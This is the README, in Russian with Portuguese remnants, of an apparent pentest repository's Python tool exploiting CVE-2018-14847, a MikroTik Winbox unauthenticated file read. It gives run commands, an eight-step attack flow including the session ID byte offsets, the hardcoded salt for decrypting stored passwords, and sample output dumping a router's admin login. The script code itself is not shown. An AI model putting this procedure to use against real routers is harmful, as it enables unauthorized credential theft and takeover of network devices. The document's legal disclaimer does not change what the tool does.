
VULNERAVEL CVE-2018-14847 - ИЗВЛЕЧЕННЫЕ УЧЕТНЫЕ ДАННЫЕ MIKROTIK НА PYTHON
Репозиторий скриптов для аудита и тестирования проникновения в сети. Используйте только на устройствах с письменного разрешения.
Эксплуатирует уязвимость неаутентифицированного чтения файлов в сервисе
Winbox MikroTik RouterOS. Обработчик файлов (handler ID 2) не проверяет
аутентификацию, что позволяет внешнему атакующему прочитать файл user.dat,
содержащий всех пользователей и пароли устройства.
Пароли хранятся в зашифрованном виде с помощью XOR с ключом MD5(пользователь + "283i4jfkai3389").
Скрипт автоматически выполняет расшифровку.
| Branch | Уязвимые до | Исправленная версия |
|---|---|---|
| Stable | 6.42 | 6.42.1 |
| Long-term | 6.40.7 | 6.40.8 |
| RC | 6.42 | 6.43 |
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291
# Цель по умолчанию на порту 8291
python3 cve_2018_14847.py 192.168.1.1
# Нестандартный порт
python3 cve_2018_14847.py 192.168.1.1 --port 8291
1. Подключается к порту 8291 (Winbox)
↓
2. Отправляет FIRST_PAYLOAD — открывает сессию + запрашивает /flash/rw/store/user.dat
↓
3. Извлекает Session ID из байта 38 ответа
↓
4. Вставляет Session ID в байт 19 SECOND_PAYLOAD
↓
5. Отправляет SECOND_PAYLOAD — читает файл user.dat
↓
6. Разбирает записи M2 → извлекает пользователя и зашифрованный пароль
↓
7. Расшифровывает пароль: XOR с MD5(пользователь + соль)
↓
8. Выводит учётные данные и сохраняет в файл
═══════════════════════════════════════════════════════
CVE-2018-14847 — MikroTik Winbox Credential Dump
Unauthenticated File Read + Password Decryption
Затронуто: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
Цель : 192.168.1.1:8291
Дата : 2026-05-20 18:06:58
[*] Подключение к 192.168.1.1:8291 ...
[+] Подключено к сервису Winbox.
[*] Отправка payload 1 (запрос файла) ...
[+] Получен ответ (84 байта). Session ID: 0x35
[*] Отправка payload 2 (чтение user.dat) ...
[+] Получены данные (312 байт).
[*] Анализ user.dat (257 полезных байт) ...
═══════════════════════════════════════════════════════
ИЗВЛЕЧЁННЫЕ УЧЁТНЫЕ ДАННЫЕ
═══════════════════════════════════════════════════════
Пользователь : admin
Пароль : senha123
Комбинация : admin:senha123
───────────────────────────────────────────────────────
[+] Найдено 1 учётная(ых) запись(ей).
[+] Результат сохранён в: mikrotik_1192.168.1.1_20260520_180658.txt
Результат автоматически сохраняется в:
mikrotik_<IP>_<TIMESTAMP>.txt
Пример: mikrotik_192.168.1.1_20260520_180658.txt
Содержит: IP цели, дату, CVE, затронутую версию и все пары пользователь:пароль.
/rede/
├── README.md # этот файл
├── cve_2018_14847.py # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md # отчёт о пентесте CGNAT
├── pentest_roteador_192.168.2.1.md # отчёт о пентесте роутера
└── mikrotik_<IP>_<TIMESTAMP>.txt # результаты, сгенерированные скриптом
ПРАВОВОЕ ПРЕДУПРЕЖДЕНИЕ: Эти инструменты предназначены исключительно для использования в авторизованных средах. Несанкционированное выполнение против систем третьих лиц является преступлением, предусмотренным Законом 12.737/2012 (Закон Кэролайн Дикманн) и ст. 154-A Уголовного кодекса Бразилии.